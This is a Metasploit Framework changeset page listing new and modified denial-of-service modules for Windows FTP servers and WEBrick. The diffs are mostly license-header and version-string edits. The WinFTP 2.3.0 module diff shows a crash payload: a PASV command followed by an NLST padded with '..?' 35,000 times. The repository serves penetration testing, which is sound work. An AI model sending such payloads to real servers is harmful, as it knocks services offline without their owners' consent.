Changeset 6095
- Timestamp:
- 01/08/09 21:33:26 (6 months ago)
- Location:
- framework3/trunk/modules/auxiliary/dos
- Files:
-
- 5 added
- 2 removed
- 2 modified
-
ftp (deleted)
-
http/webrick_regex.rb (modified) (2 diffs)
-
tftp (deleted)
-
windows/ftp/filezilla_server_port.rb (added)
-
windows/ftp/guildftp_cwdlist.rb (added)
-
windows/ftp/titan626_site.rb (added)
-
windows/ftp/vicftps50_list.rb (added)
-
windows/ftp/winftp230_nlst.rb (modified) (3 diffs)
-
windows/ftp/xmeasy560_nlst.rb (added)
Legend:
- Unmodified
- Added
- Removed
-
framework3/trunk/modules/auxiliary/dos/http/webrick_regex.rb
r6034 r6095 1 ## 2 # $Id$ 3 ## 4 5 ## 6 # This file is part of the Metasploit Framework and may be subject to 7 # redistribution and commercial restrictions. Please see the Metasploit 8 # Framework web site for more information on licensing and terms of use. 9 # http://metasploit.com/projects/Framework/ 10 ## 11 1 12 require 'msf/core' 2 13 … … 17 28 'Author' => 'kris', 18 29 'License' => MSF_LICENSE, 19 'Version' => ' 1',30 'Version' => '$Revision$', 20 31 'References' => [ 21 32 [ 'BID', '30644'], -
framework3/trunk/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
r6034 r6095 1 ## 2 # $Id$ 3 ## 4 5 ## 6 # This file is part of the Metasploit Framework and may be subject to 7 # redistribution and commercial restrictions. Please see the Metasploit 8 # Framework web site for more information on licensing and terms of use. 9 # http://metasploit.com/projects/Framework/ 10 ## 11 1 12 require 'msf/core' 2 13 … … 16 27 'Author' => 'kris', 17 28 'License' => MSF_LICENSE, 18 'Version' => ' 1',29 'Version' => '$Revision$', 19 30 'References' => 20 31 [ [ 'URL', 'http://milw0rm.com/exploits/6581'] ], … … 27 38 raw_send_recv("PASV\r\n") # NLST has to follow a PORT or PASV 28 39 29 sleep 1# *sigh* this appears to be necessary in my tests40 sleep(1) # *sigh* this appears to be necessary in my tests 30 41 31 42 raw_send("NLST #{'..?' * 35000}\r\n")
